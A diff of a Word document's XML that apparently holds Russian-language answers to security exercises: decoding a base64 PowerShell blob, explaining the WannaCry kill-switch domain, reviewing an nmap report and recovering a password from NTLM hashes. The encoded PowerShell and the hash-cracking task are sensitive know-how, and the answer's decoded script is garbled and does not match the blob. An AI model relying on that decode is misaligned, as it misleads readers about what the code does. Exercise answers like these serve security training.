+        <w:t xml:space="preserve"> = "JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIA</w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>aQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBFAG0AcAB0AFcAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQ=="</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5126,20 +6083,47 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t>decoded_bytes = base64.b64decode(encoded_string)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>decoded_bytes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> = base64.b64decode(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>encoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
@@ -5153,25 +6137,52 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-        <w:t>decoded_string = decoded_bytes.decode('utf-8', errors='ignore')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
+        <w:t>decoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>decoded_bytes.decode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>('utf-8', errors='ignore')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
@@ -5186,37 +6197,55 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:r>
-        <w:t>print(decoded_string)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>print</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>decoded_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:t>Вот раскодированное содержимое:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>stylus</w:t>
       </w:r>
     </w:p>
@@ -5228,6 +6257,9 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -5248,13 +6280,21 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
+        <w:t xml:space="preserve">    $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>$exec_wraper_st = $input -Out-String</w:t>
+        <w:t>exec_wraper_st</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $input -Out-String</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5272,23 +6312,95 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">     </w:t>
-      </w:r>
+        <w:t xml:space="preserve">     $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>$splitt_part = $exec_wraper_st.Spliti($exex_wraper_st.Length -eq $exex_wraper_st.Length -eq 2) { throw "invalid payload" }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Похоже, это фрагмент скрипта PowerShell. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
+        <w:t>splitt_part</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exec_wraper_st.Spliti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>($</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exex_wraper_st.Length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -eq $</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exex_wraper_st.Length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -eq 2) { throw "invalid payload" }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Похоже, это фрагмент скрипта </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5364,7 +6476,15 @@
         <w:t>Вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t>: Некоторые вирусы или вредоносные программы могут masquerade (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
+        <w:t xml:space="preserve">: Некоторые вирусы или вредоносные программы могут </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>masquerade</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5453,7 +6573,23 @@
         <w:t>Проверка целостности системы</w:t>
       </w:r>
       <w:r>
-        <w:t>: Запустите команду sfc /scannow в командной строке для проверки и восстановления системных файлов.</w:t>
+        <w:t xml:space="preserve">: Запустите команду </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sfc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>scannow</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> в командной строке для проверки и восстановления системных файлов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5514,6 +6650,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -5631,32 +6768,52 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Что вы можете сказать об этом URL-адресе «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com»?</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит Kryptos Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя WannaCry. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель WannaCry пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Kryptos</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5672,15 +6829,31 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя WannaCry. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя WannaCry и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
+        <w:t xml:space="preserve">Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>WannaCry</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5698,9 +6871,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5711,38 +6881,59 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования nmap?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Отчет о сканировании Nmap предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Основные аспекты отчета Nmap</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Отчет о сканировании </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Основные аспекты отчета </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5820,7 +7011,16 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        Nmap поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5844,15 +7044,55 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">    Дополнительные скрипты Nmap:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        Nmap также позволяет использовать NSE (Nmap Scripting Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
+        <w:t xml:space="preserve">    Дополнительные скрипты </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> также позволяет использовать NSE (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Scripting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5884,7 +7124,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -5903,7 +7142,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Таким образом, анализируя отчет Nmap, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
+        <w:t xml:space="preserve">Таким образом, анализируя отчет </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5920,8 +7167,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Восстановите пароль из хеша</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Восстановите пароль из </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеша</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5963,7 +7215,23 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Это указывает на использование NTLM (первый хеш) и вероятно, что второй хеш является результатом применения к паролю какой-то соли или дополнительной обработки.</w:t>
+        <w:t xml:space="preserve">Это указывает на использование NTLM (первый </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеш</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">) и вероятно, что второй </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>хеш</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> является результатом применения к паролю какой-то соли или дополнительной обработки.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/1/answer.docx
+++ b/1/answer.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" 